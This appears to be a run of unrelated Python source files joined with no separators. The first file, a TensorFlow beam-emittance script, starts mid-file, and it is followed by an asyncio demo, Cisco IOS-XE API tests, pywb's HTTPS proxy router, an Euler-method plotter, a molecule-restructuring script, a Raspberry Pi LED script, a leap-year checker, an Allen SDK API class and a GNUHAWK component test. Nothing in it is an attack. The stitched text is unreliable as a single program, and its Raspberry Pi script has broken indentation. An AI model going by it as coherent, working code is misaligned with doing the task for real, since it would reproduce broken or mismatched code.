sigmaX=np.array([[betaX,-alphaX],[-alphaX,gammaX]])*emitX;

numPart=np.int32(1e5);
X=np.random.multivariate_normal([0.,0.],sigmaX,numPart).T

plt.figure(1)
plt.plot(X[0,:],X[1,:],'.')

##


w=tf.Variable(tf.random_normal([1,1]))
w1=tf.cos(w)
w2=tf.sin(w)


P_Row_1=tf.concat([w1,-w2],0)

P_Row_2=tf.concat([w2,w1],0)


P=tf.concat([P_Row_1,P_Row_2],1)




xI=tf.placeholder(tf.float32,[2,None])

xO=tf.matmul(P,xI)

xxp=tf.reduce_mean(xO[0]*xO[1])


lossAlpha=xxp**2


rateLearn=1e-4
optTotal=tf.train.AdamOptimizer(rateLearn)
trainAlpha=optTotal.minimize(lossAlpha)

sess = tf.InteractiveSession(config=tf.ConfigProto(log_device_placement=True))

sess.run(tf.global_variables_initializer())



sizeBatch=64

for _ in xrange(8000):
    
    startBatch=np.random.randint(0,high=numPart-sizeBatch-1)
    xFeed=X[:,startBatch:startBatch+sizeBatch:]
    
    sess.run(trainAlpha,feed_dict={xI:xFeed})

    
    
    #print(sess.run(LambdaR))
    #print('---------------------------')
    print(sess.run(lossAlpha,feed_dict={xI:X}),_)
    print('_______________________________________________')



zReal=sess.run(xO,feed_dict={xI:X})


plt.figure(2)
plt.plot(zReal[0,:],zReal[1,:],'r.')
plt.axis('equal')



plt.figure(10)
plt.hold
plt.plot(zReal[0,:],zReal[1,:],'r.')
plt.plot(X[0,:],X[1,:],'b.')
#plt.plot(zReal[0,:],zReal[1,:],'r.')
plt.axis('equal')


plt.figure(11)
plt.hold
#plt.plot(zReal[0,:],zReal[1,:],'r.')
plt.plot(X[0,:],X[1,:],'b.')
plt.plot(zReal[0,:],zReal[1,:],'r.')
plt.axis('equal')


zRealCov=np.cov(zReal)
emitXReal=np.sqrt(np.linalg.det(zRealCov))

print(emitXReal)



import threading
import asyncio

async def hello():
    print('Hello world! (%s)' % threading.currentThread())
    await asyncio.sleep(1)
    print('Hello again! (%s)' % threading.currentThread())

loop = asyncio.get_event_loop()
tasks = [hello(), hello()]
loop.run_until_complete(asyncio.wait(tasks))
loop.close()
"""
Tests are performed against csr1000v-universalk9.03.15.00.S.155-2.S-std.
"""
import unittest

from iosxe.iosxe import IOSXE
from iosxe.exceptions import AuthError

node = '172.16.92.134'
username = 'cisco'
password = 'cisco'
port = 55443


class TestIOSXE(unittest.TestCase):

    def setUp(self):
        self.xe = IOSXE(node=node, username=username, password=password, disable_warnings=True)

    def test_iosxe_is_a_IOSXE(self):
        self.assertIsInstance(self.xe, IOSXE)

    def test_invalid_user_pass_returns_auth_error(self):

        self.assertRaises(AuthError, IOSXE, node=node, username='stuff', password='things',
                          disable_warnings=True)

    def test_url_base(self):
        self.assertEqual(self.xe.url_base, 'https://{0}:{1}/api/v1'.format(node, port))

    def test_token_uri(self):
        self.assertEqual(self.xe.token_uri, '/auth/token-services')

    def test_save_config_success(self):
        resp = self.xe.save_config()
        self.assertEqual(204, resp.status_code)


from __future__ import absolute_import

from pywb.framework.wbrequestresponse import WbResponse, WbRequest
from pywb.framework.archivalrouter import ArchivalRouter

from six.moves.urllib.parse import urlsplit
import base64

import socket
import ssl

from io import BytesIO

from pywb.rewrite.url_rewriter import SchemeOnlyUrlRewriter, UrlRewriter
from pywb.rewrite.rewrite_content import RewriteContent
from pywb.utils.wbexception import BadRequestException

from pywb.utils.bufferedreaders import BufferedReader
from pywb.utils.loaders import to_native_str

from pywb.framework.proxy_resolvers import ProxyAuthResolver, CookieResolver, IPCacheResolver

from tempfile import SpooledTemporaryFile


#=================================================================
class ProxyArchivalRouter(ArchivalRouter):
    """
    A router which combines both archival and proxy modes support
    First, request is treated as a proxy request using ProxyRouter
    Second, if not handled by the router, it is treated as a regular
    archival mode request.
    """
    def __init__(self, routes, **kwargs):
        super(ProxyArchivalRouter, self).__init__(routes, **kwargs)
        self.proxy = ProxyRouter(routes, **kwargs)

    def __call__(self, env):
        response = self.proxy(env)
        if response:
            return response

        response = super(ProxyArchivalRouter, self).__call__(env)
        if response:
            return response


#=================================================================
class ProxyRouter(object):
    """
    A router which supports http proxy mode requests
    Handles requests of the form: GET http://example.com

    The router returns latest capture by default.
    However, if Memento protocol support is enabled,
    the memento Accept-Datetime header can be used
    to select specific capture.
    See: http://www.mementoweb.org/guide/rfc/#Pattern1.3
    for more details.
    """

    BLOCK_SIZE = 4096
    DEF_MAGIC_NAME = 'pywb.proxy'
    BUFF_RESPONSE_MEM_SIZE = 1024*1024

    CERT_DL_PEM = '/pywb-ca.pem'
    CERT_DL_P12 = '/pywb-ca.p12'

    CA_ROOT_FILE = './ca/pywb-ca.pem'
    CA_ROOT_NAME = 'pywb https proxy replay CA'
    CA_CERTS_DIR = './ca/certs/'

    EXTRA_HEADERS = {'cache-control': 'no-cache',
                     'connection': 'close',
                     'p3p': 'CP="NOI ADM DEV COM NAV OUR STP"'}

    def __init__(self, routes, **kwargs):
        self.error_view = kwargs.get('error_view')

        proxy_options = kwargs.get('config', {})
        if proxy_options:
            proxy_options = proxy_options.get('proxy_options', {})

        self.magic_name = proxy_options.get('magic_name')
        if not self.magic_name:
            self.magic_name = self.DEF_MAGIC_NAME
            proxy_options['magic_name'] = self.magic_name

        self.extra_headers = proxy_options.get('extra_headers')
        if not self.extra_headers:
            self.extra_headers = self.EXTRA_HEADERS
            proxy_options['extra_headers'] = self.extra_headers

        res_type = proxy_options.get('cookie_resolver', True)
        if res_type == 'auth' or not res_type:
            self.resolver = ProxyAuthResolver(routes, proxy_options)
        elif res_type == 'ip':
            self.resolver = IPCacheResolver(routes, proxy_options)
        #elif res_type == True or res_type == 'cookie':
        #    self.resolver = CookieResolver(routes, proxy_options)
        else:
            self.resolver = CookieResolver(routes, proxy_options)

        self.use_banner = proxy_options.get('use_banner', True)
        self.use_wombat = proxy_options.get('use_client_rewrite', True)

        self.proxy_cert_dl_view = proxy_options.get('proxy_cert_download_view')

        if not proxy_options.get('enable_https_proxy'):
            self.ca = None
            return

        try:
            from certauth.certauth import CertificateAuthority
        except ImportError:  #pragma: no cover
            print('HTTPS proxy is not available as the "certauth" module ' +
                  'is not installed')
            print('Please install via "pip install certauth" ' +
                  'to enable HTTPS support')
            self.ca = None
            return

        # HTTPS Only Options
        ca_file = proxy_options.get('root_ca_file', self.CA_ROOT_FILE)

        # attempt to create the root_ca_file if doesn't exist
        # (generally recommended to create this seperately)
        ca_name = proxy_options.get('root_ca_name', self.CA_ROOT_NAME)

        certs_dir = proxy_options.get('certs_dir', self.CA_CERTS_DIR)
        self.ca = CertificateAuthority(ca_file=ca_file,
                                       certs_dir=certs_dir,
                                       ca_name=ca_name)

        self.use_wildcard = proxy_options.get('use_wildcard_certs', True)

    def __call__(self, env):
        is_https = (env['REQUEST_METHOD'] == 'CONNECT')
        ArchivalRouter.ensure_rel_uri_set(env)

        # for non-https requests, check non-proxy urls
        if not is_https:
            url = env['REL_REQUEST_URI']

            if not url.startswith(('http://', 'https://')):
                return None

            env['pywb.proxy_scheme'] = 'http'

        route = None
        coll = None
        matcher = None
        response = None
        ts = None

        # check resolver, for pre connect resolve
        if self.resolver.pre_connect:
            route, coll, matcher, ts, response = self.resolver.resolve(env)
            if response:
                return response

        # do connect, then get updated url
        if is_https:
            response = self.handle_connect(env)
            if response:
                return response

            url = env['REL_REQUEST_URI']
        else:
            parts = urlsplit(env['REL_REQUEST_URI'])
            hostport = parts.netloc.split(':', 1)
            env['pywb.proxy_host'] = hostport[0]
            env['pywb.proxy_port'] = hostport[1] if len(hostport) == 2 else ''
            env['pywb.proxy_req_uri'] = parts.path
            if parts.query:
                env['pywb.proxy_req_uri'] += '?' + parts.query
                env['pywb.proxy_query'] = parts.query

        if self.resolver.supports_switching:
            env['pywb_proxy_magic'] = self.magic_name

        # route (static) and other resources to archival replay
        if env['pywb.proxy_host'] == self.magic_name:
            env['REL_REQUEST_URI'] = env['pywb.proxy_req_uri']

            # special case for proxy install
            response = self.handle_cert_install(env)
            if response:
                return response

            return None

        # check resolver, post connect
        if not self.resolver.pre_connect:
            route, coll, matcher, ts, response = self.resolver.resolve(env)
            if response:
                return response

        rel_prefix = ''

        custom_prefix = env.get('HTTP_PYWB_REWRITE_PREFIX', '')
        if custom_prefix:
            host_prefix = custom_prefix
            urlrewriter_class = UrlRewriter
            abs_prefix = True
            # always rewrite to absolute here
            rewrite_opts = dict(no_match_rel=True)
        else:
            host_prefix = env['pywb.proxy_scheme'] + '://' + self.magic_name
            urlrewriter_class = SchemeOnlyUrlRewriter
            abs_prefix = False
            rewrite_opts = {}

        # special case for proxy calendar
        if (env['pywb.proxy_host'] == 'query.' + self.magic_name):
            url = env['pywb.proxy_req_uri'][1:]
            rel_prefix = '/'

        if ts is not None:
            url = ts + '/' + url

        wbrequest = route.request_class(env,
                              request_uri=url,
                              wb_url_str=url,
                              coll=coll,
                              host_prefix=host_prefix,
                              rel_prefix=rel_prefix,
                              wburl_class=route.handler.get_wburl_type(),
                              urlrewriter_class=urlrewriter_class,
                              use_abs_prefix=abs_prefix,
                              rewrite_opts=rewrite_opts,
                              is_proxy=True)

        if matcher:
            route.apply_filters(wbrequest, matcher)

        # full rewrite and banner
        if self.use_wombat and self.use_banner:
            wbrequest.wb_url.mod = ''
        elif self.use_banner:
        # banner only, no rewrite
            wbrequest.wb_url.mod = 'bn_'
        else:
        # unaltered, no rewrite or banner
            wbrequest.wb_url.mod = 'uo_'

        response = route.handler(wbrequest)
        if not response:
            return None

        # add extra headers for replay responses
        if wbrequest.wb_url and wbrequest.wb_url.is_replay():
            response.status_headers.replace_headers(self.extra_headers)

        # check for content-length
        res = response.status_headers.get_header('content-length')
        try:
            if int(res) > 0:
                return response
        except:
            pass

        # need to either chunk or buffer to get content-length
        if env.get('SERVER_PROTOCOL') == 'HTTP/1.1':
            response.status_headers.remove_header('content-length')
            response.status_headers.headers.append(('Transfer-Encoding', 'chunked'))
            response.body = self._chunk_encode(response.body)
        else:
            response.body = self._buffer_response(response.status_headers,
                                                  response.body)

        return response

    @staticmethod
    def _chunk_encode(orig_iter):
        for chunk in orig_iter:
            if not len(chunk):
                continue
            chunk_len = b'%X\r\n' % len(chunk)
            yield chunk_len
            yield chunk
            yield b'\r\n'

        yield b'0\r\n\r\n'

    @staticmethod
    def _buffer_response(status_headers, iterator):
        out = SpooledTemporaryFile(ProxyRouter.BUFF_RESPONSE_MEM_SIZE)
        size = 0

        for buff in iterator:
            size += len(buff)
            out.write(buff)

        content_length_str = str(size)
        # remove existing content length
        status_headers.replace_header('Content-Length',
                                      content_length_str)

        out.seek(0)
        return RewriteContent.stream_to_gen(out)

    def get_request_socket(self, env):
        if not self.ca:
            return None

        sock = None

        if env.get('uwsgi.version'):  # pragma: no cover
            try:
                import uwsgi
                fd = uwsgi.connection_fd()
                conn = socket.fromfd(fd, socket.AF_INET, socket.SOCK_STREAM)
                try:
                    sock = socket.socket(_sock=conn)
                except:
                    sock = conn
            except Exception as e:
                pass
        elif env.get('gunicorn.socket'):  # pragma: no cover
            sock = env['gunicorn.socket']

        if not sock:
            # attempt to find socket from wsgi.input
            input_ = env.get('wsgi.input')
            if input_:
                if hasattr(input_, '_sock'):  # pragma: no cover
                    raw = input_._sock
                    sock = socket.socket(_sock=raw)  # pragma: no cover
                elif hasattr(input_, 'raw'):
                    sock = input_.raw._sock

        return sock

    def handle_connect(self, env):
        sock = self.get_request_socket(env)
        if not sock:
            return WbResponse.text_response('HTTPS Proxy Not Supported',
                                            '405 HTTPS Proxy Not Supported')

        sock.send(b'HTTP/1.0 200 Connection Established\r\n')
        sock.send(b'Proxy-Connection: close\r\n')
        sock.send(b'Server: pywb proxy\r\n')
        sock.send(b'\r\n')

        hostname, port = env['REL_REQUEST_URI'].split(':')

        if not self.use_wildcard:
            certfile = self.ca.cert_for_host(hostname)
        else:
            certfile = self.ca.get_wildcard_cert(hostname)

        try:
            ssl_sock = ssl.wrap_socket(sock,
                                       server_side=True,
                                       certfile=certfile,
                                       #ciphers="ALL",
                                       suppress_ragged_eofs=False,
                                       ssl_version=ssl.PROTOCOL_SSLv23
                                       )
            env['pywb.proxy_ssl_sock'] = ssl_sock

            buffreader = BufferedReader(ssl_sock, block_size=self.BLOCK_SIZE)

            statusline = to_native_str(buffreader.readline().rstrip())

        except Exception as se:
            raise BadRequestException(se.message)

        statusparts = statusline.split(' ')

        if len(statusparts) < 3:
            raise BadRequestException('Invalid Proxy Request: ' + statusline)

        env['REQUEST_METHOD'] = statusparts[0]
        env['REL_REQUEST_URI'] = ('https://' +
                                  env['REL_REQUEST_URI'].replace(':443', '') +
                                  statusparts[1])

        env['SERVER_PROTOCOL'] = statusparts[2].strip()

        env['pywb.proxy_scheme'] = 'https'

        env['pywb.proxy_host'] = hostname
        env['pywb.proxy_port'] = port
        env['pywb.proxy_req_uri'] = statusparts[1]

        queryparts = env['REL_REQUEST_URI'].split('?', 1)
        env['PATH_INFO'] = queryparts[0]
        env['QUERY_STRING'] = queryparts[1] if len(queryparts) > 1 else ''
        env['pywb.proxy_query'] = env['QUERY_STRING']

        while True:
            line = to_native_str(buffreader.readline())
            if line:
                line = line.rstrip()

            if not line:
                break

            parts = line.split(':', 1)
            if len(parts) < 2:
                continue

            name = parts[0].strip()
            value = parts[1].strip()

            name = name.replace('-', '_').upper()

            if name not in ('CONTENT_LENGTH', 'CONTENT_TYPE'):
                name = 'HTTP_' + name

            env[name] = value

        env['wsgi.input'] = buffreader
        #remain = buffreader.rem_length()
        #if remain > 0:
            #remainder = buffreader.read()
            #env['wsgi.input'] = BufferedReader(BytesIO(remainder))
            #remainder = buffreader.read(self.BLOCK_SIZE)
            #env['wsgi.input'] = BufferedReader(ssl_sock,
            #                                   block_size=self.BLOCK_SIZE,
            #                                   starting_data=remainder)

    def handle_cert_install(self, env):
        if env['pywb.proxy_req_uri'] in ('/', '/index.html', '/index.html'):
            available = (self.ca is not None)

            if self.proxy_cert_dl_view:
                return (self.proxy_cert_dl_view.
                         render_response(available=available,
                                         pem_path=self.CERT_DL_PEM,
                                         p12_path=self.CERT_DL_P12))

        elif env['pywb.proxy_req_uri'] == self.CERT_DL_PEM:
            if not self.ca:
                return None

            buff = b''
            with open(self.ca.ca_file, 'rb') as fh:
                buff = fh.read()

            content_type = 'application/x-x509-ca-cert'
            headers = [('Content-Length', str(len(buff)))]

            return WbResponse.bin_stream([buff],
                                         content_type=content_type,
                                         headers=headers)

        elif env['pywb.proxy_req_uri'] == self.CERT_DL_P12:
            if not self.ca:
                return None

            buff = self.ca.get_root_PKCS12()

            content_type = 'application/x-pkcs12'
            headers = [('Content-Length', str(len(buff)))]

            return WbResponse.bin_stream([buff],
                                         content_type=content_type,
                                         headers=headers)

# -*- coding: utf-8 -*-

import os
from pygal import *


def listeEuler(f, x0, y0, pas, n):
    x, y, L = x0, y0, []
    for k in range(n):
        L += [(x, y)]
        x += pas
        y += pas * f(x, y)
    return L


def euler(f, x0, y0, xf, n):
    pas = (xf - x0) / n
    courbe = XY()
    courbe.title = "Methode d Euler"
    courbe.add("Solution approchee", listeEuler(f, x0, y0, pas, n))
    courbe.render_to_file("courbeEulerPython.svg")

os.system("pause")

#!/usr/bin/env python
# -*- coding: utf-8 -*-

import os
import argparse
import pprint

import proteindf_bridge as bridge

import logging
import logging.config


def get_rest_of_frame_molecule(frame_molecule, selected_molecule):
    # calc the rest
    selector = bridge.Select_AtomGroup(selected_molecule)
    selected = frame_molecule.select(selector)
    rest_molecule = frame_molecule ^ selected

    return rest_molecule


def assign_rest_molecule(rest_molecule, output_atom_group,
                         model_id="model_1", chain_id="Z", res_name="UNK"):
    chain = bridge.AtomGroup()
    res = bridge.AtomGroup()
    res.name = res_name
    atom_id = 1
    for atom in rest_molecule.get_atom_list():
        res.set_atom(atom_id, atom)
        atom_id += 1
    chain.set_group(1, res)

    output_atom_group[model_id].set_group(chain_id, chain)


def main():
    parser = argparse.ArgumentParser(
        description='restructure brd file by reference file')
    parser.add_argument('target_brd_path',
                        nargs=1,
                        help='target brd file')
    parser.add_argument('ref_brd_path',
                        nargs=1,
                        help='reference brd file')
    parser.add_argument('-o', '--output_path',
                        nargs=1,
                        default=["output.brd"])
    parser.add_argument('-r', '--range',
                        nargs=1,
                        default=[1.0E-5])
    parser.add_argument('-v', '--verbose',
                        action='store_true',
                        default=False)
    args = parser.parse_args()
    # print(args)

    target_brd_path = args.target_brd_path[0]
    ref_brd_path = args.ref_brd_path[0]
    output_path = args.output_path[0]
    range = float(args.range[0])
    verbose = args.verbose

    if verbose:
        print("target: {}".format(target_brd_path))
        print("reference: {}".format(ref_brd_path))

    # load
    target_ag = bridge.load_atomgroup(target_brd_path)
    ref_ag = bridge.load_atomgroup(ref_brd_path)

    # matching
    #target_selector = bridge.Select_AtomGroup(target_ag)
    #restructured = ref_ag.select(target_selector)

    # calc the rest
    #rest_of_target = get_rest_of_frame_molecule(target_ag, restructured)
    #assign_rest_molecule(rest_of_target, restructured)

    restructured = target_ag.restructure(ref_ag, range)

    if output_path:
        if verbose:
            print("output brd file: {}".format(output_path))
        bridge.save_atomgroup(restructured, output_path)


if __name__ == '__main__':
    #import cProfile
    #pr = cProfile.Profile()
    # pr.enable()
    main()
    # pr.disable()
    # pr.dump_stats('program.profile')

import RPi.GPIO as GPIO

KnockPin = 11 
LedPin = 12

Led_status = 1

def setup():
	GPIO.setmode(GPIO.BOARD)       # Numbers GPIOs by physical location
	GPIO.setup(LedPin, GPIO.OUT)   # Set LedPin's mode is output
	GPIO.setup(KnockPin, GPIO.IN, pull_up_down=GPIO.PUD_UP)
	GPIO.output(LedPin, GPIO.HIGH) # Set LedPin high(+3.3V) to off led

def swLed(ev=None):
	global Led_status
	Led_status = not Led_status
	GPIO.output(LedPin, Led_status)  # switch led status(on-->off; off-->on)
        print "LED: " + ("on" if Led_status else "off")

def loop():
	GPIO.add_event_detect(KnockPin, GPIO.FALLING, callback=swLed, bouncetime=200) # wait for falling
	while True:
		pass   # Don't do anything

def destroy():
	GPIO.output(LedPin, GPIO.LOW)     # led off
	GPIO.cleanup()                     # Release resource

if __name__ == '__main__':     # Program start from here
	setup()
	try:
		loop()
	except KeyboardInterrupt:  # When 'Ctrl+C' is pressed, the child program destroy() will be  executed.
		destroy()



#!/usr/bin/python
# -*- coding: utf-8 -*-

# Copyright (C) 2018  David Arroyo Menéndez

# Author: David Arroyo Menéndez <davidam@gnu.org>
# Maintainer: David Arroyo Menéndez <davidam@gnu.org>

# This file is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3, or (at your option)
# any later version.

# This file is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.

# You should have received a copy of the GNU General Public License
# along with GNU Emacs; see the file COPYING.  If not, write to
# the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor,
# Boston, MA 02110-1301 USA,
# Python program to check if the input year is a leap year or not

year = 2000

# To get year (integer input) from the user
# year = int(input("Enter a year: "))

if (year % 4) == 0:
   if (year % 100) == 0:
       if (year % 400) == 0:
           print("{0} is a leap year".format(year))
       else:
           print("{0} is not a leap year".format(year))
   else:
       print("{0} is a leap year".format(year))
else:
   print("{0} is not a leap year".format(year))

# Copyright 2015 Allen Institute for Brain Science
# This file is part of Allen SDK.
#
# Allen SDK is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, version 3 of the License.
#
# Allen SDK is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Allen SDK.  If not, see <http://www.gnu.org/licenses/>.

from allensdk.api.api import Api
import os, json
from collections import OrderedDict

class BiophysicalPerisomaticApi(Api):
    _NWB_file_type = 'NWB'
    _SWC_file_type = '3DNeuronReconstruction'
    _MOD_file_type = 'BiophysicalModelDescription'
    _FIT_file_type = 'NeuronalModelParameters'
    
    def __init__(self, base_uri=None):
        super(BiophysicalPerisomaticApi, self).__init__(base_uri)
        self.cache_stimulus = True
        self.ids = {}
        self.sweeps = []
        self.manifest = {}
    
    
    def build_rma(self, neuronal_model_id, fmt='json'):
        '''Construct a query to find all files related to a neuronal model.
        
        Parameters
        ----------
        neuronal_model_id : integer or string representation
            key of experiment to retrieve.
        fmt : string, optional
            json (default) or xml
        
        Returns
        -------
        string
            RMA query url.
        '''
        include_associations = ''.join([
            'neuronal_model_template(well_known_files(well_known_file_type)),',
            'specimen',
            '(ephys_result(well_known_files(well_known_file_type)),'
            'neuron_reconstructions(well_known_files(well_known_file_type)),',
            'ephys_sweeps),',
            'well_known_files(well_known_file_type)'])
        criteria_associations = ''.join([
            ("[id$eq%d]," % (neuronal_model_id)),
            include_associations])
        
        return ''.join([self.rma_endpoint, 
                        '/query.',
                        fmt,
                        '?q=',
                        'model::NeuronalModel,',
                        'rma::criteria,',
                        criteria_associations,
                        ',rma::include,',
                        include_associations])
    
    
    def read_json(self, json_parsed_data):
        '''Get the list of well_known_file ids from a response body
        containing nested sample,microarray_slides,well_known_files.
        
        Parameters
        ----------
        json_parsed_data : dict
           Response from the Allen Institute Api RMA.
        
        Returns
        -------
        list of strings
            Well known file ids.
        '''
        self.ids = {
            'stimulus': {},
            'morphology': {},
            'modfiles': {},
            'fit': {}
        }
        self.sweeps = []
        
        if 'msg' in json_parsed_data:
            for neuronal_model in json_parsed_data['msg']:
                if 'well_known_files' in neuronal_model:
                    for well_known_file in neuronal_model['well_known_files']:
                        if ('id' in well_known_file and
                            'path' in well_known_file and
                            self.is_well_known_file_type(well_known_file,
                                                         BiophysicalPerisomaticApi._FIT_file_type)):
                            self.ids['fit'][str(well_known_file['id'])] = \
                                os.path.split(well_known_file['path'])[1]
                
                if 'neuronal_model_template' in neuronal_model:
                    neuronal_model_template = neuronal_model['neuronal_model_template']
                    if 'well_known_files' in neuronal_model_template:
                        for well_known_file in neuronal_model_template['well_known_files']:
                            if ('id' in well_known_file and
                                'path' in well_known_file and
                                self.is_well_known_file_type(well_known_file,
                                                             BiophysicalPerisomaticApi._MOD_file_type)):
                                self.ids['modfiles'][str(well_known_file['id'])] = \
                                    os.path.join('modfiles',
                                                 os.path.split(well_known_file['path'])[1])
                
                if 'specimen' in neuronal_model:
                    specimen = neuronal_model['specimen']
                    
                    if 'neuron_reconstructions' in specimen:
                        for neuron_reconstruction in specimen['neuron_reconstructions']:
                            if 'well_known_files' in neuron_reconstruction:
                                for well_known_file in neuron_reconstruction['well_known_files']:
                                    if ('id' in well_known_file and
                                        'path' in well_known_file and
                                        self.is_well_known_file_type(well_known_file,
                                                                     BiophysicalPerisomaticApi._SWC_file_type)):
                                        self.ids['morphology'][str(well_known_file['id'])] = \
                                            os.path.split(well_known_file['path'])[1]
                    
                    if 'ephys_result' in specimen:
                        ephys_result = specimen['ephys_result']
                        if 'well_known_files' in ephys_result:
                            for well_known_file in ephys_result['well_known_files']:
                                if ('id' in well_known_file and
                                    'path' in well_known_file and
                                    self.is_well_known_file_type(well_known_file,
                                                                 BiophysicalPerisomaticApi._NWB_file_type)):
                                        self.ids['stimulus'][str(well_known_file['id'])] = \
                                            "%d.nwb" % (ephys_result['id'])
                    
                    
                    self.sweeps = [sweep['sweep_number'] 
                                   for sweep in specimen['ephys_sweeps']
                                   if sweep['stimulus_name'] != 'Test']
        
        return self.ids
    
    
    def is_well_known_file_type(self, wkf, name):
        '''Check if a structure has the expected name.
        
        Parameters
        ----------
        wkf : dict
            A well-known-file structure with nested type information.
        name : string
            The expected type name
        
        See Also
        --------
        read_json: where this helper function is used.
        '''
        try:
            return wkf['well_known_file_type']['name'] == name
        except:
            return False
    
    
    def get_well_known_file_ids(self, neuronal_model_id):
        '''Query the current RMA endpoint with a neuronal_model id
        to get the corresponding well known file ids.
        
        Returns
        -------
        list
            A list of well known file id strings.
        '''
        rma_builder_fn = self.build_rma
        json_traversal_fn = self.read_json
        
        return self.do_query(rma_builder_fn, json_traversal_fn, neuronal_model_id)
    
    
    def create_manifest(self,
                        fit_path='',
                        stimulus_filename='',
                        swc_morphology_path='',
                        sweeps=[]):
        '''Generate a json configuration file with parameters for a 
        a biophysical experiment.
        
        Parameters
        ----------
        fit_path : string
            filename of a json configuration file with cell parameters.
        stimulus_filename : string
            path to an NWB file with input currents.
        swc_morphology_path : string
            file in SWC format.
        sweeps : array of integers
            which sweeps in the stimulus file are to be used.
        '''
        self.manifest = OrderedDict()
        self.manifest['biophys'] = [{
                'model_file': [ 'manifest.json',  fit_path ]
            }]
        self.manifest['runs'] = [{
                'sweeps': sweeps
            }]
        self.manifest['neuron'] = [{
                'hoc': [ 'stdgui.hoc', 'import3d.hoc' ]
            }]
        self.manifest['manifest'] = [
                {
                    'type': 'dir',
                    'spec': '.',
                    'key': 'BASEDIR'
                },
                {
                    'type': 'dir',
                    'spec': 'work',
                    'key': 'WORKDIR',
                    'parent': 'BASEDIR'
                },
                {
                    'type': 'file',
                    'spec': swc_morphology_path,
                    'key': 'MORPHOLOGY'
                },
                {
                    'type': 'dir',
                    'spec': 'modfiles',
                    'key': 'MODFILE_DIR'
                },
                {
                    'type': 'file',
                    'format': 'NWB',
                    'spec': stimulus_filename,
                    'key': 'stimulus_path'
                },
                {
                  'parent_key': 'WORKDIR', 
                  'type': 'file', 
                  'format': 'NWB',
                  'spec': stimulus_filename, 
                  'key': 'output'
                }
            ]
    
    
    def cache_data(self,
                   neuronal_model_id,
                   working_directory=None):
        '''Take a an experiment id, query the Api RMA to get well-known-files
        download the files, and store them in the working directory.
        
        Parameters
        ----------
        neuronal_model_id : int or string representation
            found in the neuronal_model table in the api
        working_directory : string
            Absolute path name where the downloaded well-known files will be stored.
        '''
        if working_directory is None:
            working_directory = self.default_working_directory
        try:
            os.stat(working_directory)
        except:
            os.mkdir(working_directory)
        
        
        work_dir = os.path.join(working_directory, 'work')
        try:
            os.stat(work_dir)
        except:
            os.mkdir(work_dir)
        
        modfile_dir = os.path.join(working_directory, 'modfiles')
        try:
            os.stat(modfile_dir)
        except:
            os.mkdir(modfile_dir)
        
        well_known_file_id_dict = self.get_well_known_file_ids(neuronal_model_id)
        
        for key, id_dict in well_known_file_id_dict.items():
            if (not self.cache_stimulus) and (key == 'stimulus'):
                continue
            
            for well_known_id, filename in id_dict.items():
                well_known_file_url = self.construct_well_known_file_download_url(well_known_id)
                cached_file_path = os.path.join(working_directory, filename)
                self.retrieve_file_over_http(well_known_file_url, cached_file_path)
        
        fit_path = self.ids['fit'].values()[0]
        stimulus_filename = self.ids['stimulus'].values()[0]
        swc_morphology_path = self.ids['morphology'].values()[0]
        sweeps = sorted(self.sweeps)
        
        self.create_manifest(fit_path,
                             stimulus_filename,
                             swc_morphology_path,
                             sweeps)
        
        manifest_path = os.path.join(working_directory, 'manifest.json')
        with open(manifest_path, 'wb') as f:
            f.write(json.dumps(self.manifest, indent=2))

#!/usr/bin/env python
#
# This file is protected by Copyright. Please refer to the COPYRIGHT file 
# distributed with this source distribution.
# 
# This file is part of GNUHAWK.
# 
# GNUHAWK is free software: you can redistribute it and/or modify is under the 
# terms of the GNU General Public License as published by the Free Software 
# Foundation, either version 3 of the License, or (at your option) any later 
# version.
# 
# GNUHAWK is distributed in the hope that it will be useful, but WITHOUT ANY 
# WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR 
# A PARTICULAR PURPOSE.  See the GNU General Public License for more details.

# You should have received a copy of the GNU General Public License along with 
# this program.  If not, see http://www.gnu.org/licenses/.
#
 
import unittest
import ossie.utils.testing
import os
from omniORB import any

class ComponentTests(ossie.utils.testing.ScaComponentTestCase):
    """Test for all component implementations in sig_source_i"""

    def testScaBasicBehavior(self):
        #######################################################################
        # Launch the component with the default execparams
        execparams = self.getPropertySet(kinds=("execparam",), modes=("readwrite", "writeonly"), includeNil=False)
        execparams = dict([(x.id, any.from_any(x.value)) for x in execparams])
        self.launch(execparams)
        
        #######################################################################
        # Verify the basic state of the component
        self.assertNotEqual(self.comp, None)
        self.assertEqual(self.comp.ref._non_existent(), False)
        self.assertEqual(self.comp.ref._is_a("IDL:CF/Resource:1.0"), True)
        self.assertEqual(self.spd.get_id(), self.comp.ref._get_identifier())
        
        #######################################################################
        # Simulate regular component startup
        # Verify that initialize nor configure throw errors
        self.comp.initialize()
        configureProps = self.getPropertySet(kinds=("configure",), modes=("readwrite", "writeonly"), includeNil=False)
        self.comp.configure(configureProps)
        
        #######################################################################
        # Validate that query returns all expected parameters
        # Query of '[]' should return the following set of properties
        expectedProps = []
        expectedProps.extend(self.getPropertySet(kinds=("configure", "execparam"), modes=("readwrite", "readonly"), includeNil=True))
        expectedProps.extend(self.getPropertySet(kinds=("allocate",), action="external", includeNil=True))
        props = self.comp.query([])
        props = dict((x.id, any.from_any(x.value)) for x in props)
        # Query may return more than expected, but not less
        for expectedProp in expectedProps:
            self.assertEquals(props.has_key(expectedProp.id), True)
        
        #######################################################################
        # Verify that all expected ports are available
        for port in self.scd.get_componentfeatures().get_ports().get_uses():
            port_obj = self.comp.getPort(str(port.get_usesname()))
            self.assertNotEqual(port_obj, None)
            self.assertEqual(port_obj._non_existent(), False)
            self.assertEqual(port_obj._is_a("IDL:CF/Port:1.0"),  True)
            
        for port in self.scd.get_componentfeatures().get_ports().get_provides():
            port_obj = self.comp.getPort(str(port.get_providesname()))
            self.assertNotEqual(port_obj, None)
            self.assertEqual(port_obj._non_existent(), False)
            self.assertEqual(port_obj._is_a(port.get_repid()),  True)
            
        #######################################################################
        # Make sure start and stop can be called without throwing exceptions
